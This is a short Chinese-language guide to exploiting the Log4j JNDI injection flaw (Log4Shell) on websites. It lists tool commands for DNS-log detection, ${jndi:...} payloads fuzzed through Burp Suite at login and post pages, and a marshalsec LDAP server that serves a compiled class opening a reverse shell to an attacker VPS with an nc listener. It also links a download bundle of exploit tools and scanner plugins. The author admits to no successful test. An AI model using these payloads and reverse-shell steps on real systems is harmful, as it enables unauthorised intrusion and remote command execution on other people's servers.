一 漏洞检测:
-
xx.24b5010c.dns.1433.eu.org //dnslog地址
10.10.10.10 //vps外网地址 -
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping xx.24b5010c.dns.1433.eu.org" -A 10.10.10.10
得到类似几个地址:
rmi://10.10.10.10:1099/iqnqyi
ldap://10.10.10.10:1389/iqnqyi
rmi://10.10.10.10:1099/3vmqfk
ldap://10.10.10.10:1389/3vmqfk
rmi://10.10.10.10:1099/jan8oe
保存fuzz.txt
-
在系统登录处或者post主页:
${jndi:exp}
burpsuite exp设置变量,加载字典fuzz.txt,去掉转义,刷新dnslog查看数据。 -
记得查看防火墙放行端口。
二 命令执行:
-
vps开启web服务和监听端口
python3 -m http.server 9092,以及监听端口nc -l 9091
windows,使用./src/ExecTemplateJDK7.java 修改里面的host和port为要反弹的地址
linux,使用./src/linux.java,其实是cmd.exe改成/bin/bash
-
编译:javac ExecTemplateJDK7.java,生成ExecTemplateJDK7.class
-
执行:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://10.10.10.10:9092/#ExecTemplateJDK7 1389
-
在系统登录处或者post主页:${jndi:exp}
burpsuite exp设置变量,加载字典fuzz.txt,去掉转义 -
看nc情况
打包下载地址:链接: https://pan.baidu.com/s/1Ka2jg-C-Wqn92vFBM2ReNw 提取码: 9e71 复制这段内容后
申明:我测试了好多个站都没有检测成功有,不知道是exp的问题还是站的问题。有复现成功的吱一声谢谢。
burp检测插件ceeio,GitHub - guguyu1/log4j2_burp_scan: log4j2 被动 burp rce扫描工具 get post cookie 全参数识别
dnslog:GitHub - f0ng/log4jscanner: log4j burp插件